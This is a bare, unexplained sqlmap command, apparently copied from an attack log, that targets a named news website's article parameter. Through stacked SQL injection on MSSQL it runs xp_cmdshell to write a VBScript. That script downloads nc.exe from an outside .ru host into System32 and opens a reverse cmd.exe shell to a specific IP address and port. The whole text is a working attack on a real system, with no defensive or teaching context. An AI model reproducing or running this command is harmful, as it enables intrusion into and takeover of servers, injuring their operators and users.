python sqlmap.py -u "http://www.chicagobusiness.com/apps/pbcs.dll/exec?name=geta

1. python sqlmap.py -u "http://www.chicagobusiness.com/apps/pbcs.dll/exec?name=getarticleinformation&AID=/20170718/NEWS03/170719868" -p AID --dbms=mssql --technique=S --time-sec=1 --sql-query="EXEC xp_cmdshell 'echo strFileURL = \"http://anita-flowers.ru/sstudioinclude/nc.exe\" : strHDLocation = \"c:\Windows\System32\nc.exe\" : Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\"): objXMLHTTP.open \"GET\", strFileURL, false : objXMLHTTP.send() : If objXMLHTTP.Status = 200 Then>d.vbs&echo Set objADOStream = CreateObject(\"ADODB.Stream\"):objADOStream.Open:objADOStream.Type = 1 :objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0:Set objFSO = Createobject(\"Scripting.FileSystemObject\") : If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation>>d.vbs&echo Set objFSO = Nothing:objADOStream.SaveToFile strHDLocation:objADOStream.Close:Set objADOStream = Nothing>>d.vbs&echo End if : Set objXMLHTTP = Nothing>>d.vbs&cscript.exe d.vbs&nc.exe -nv 198.211.119.213 31337 -e cmd.exe'" --parse-errors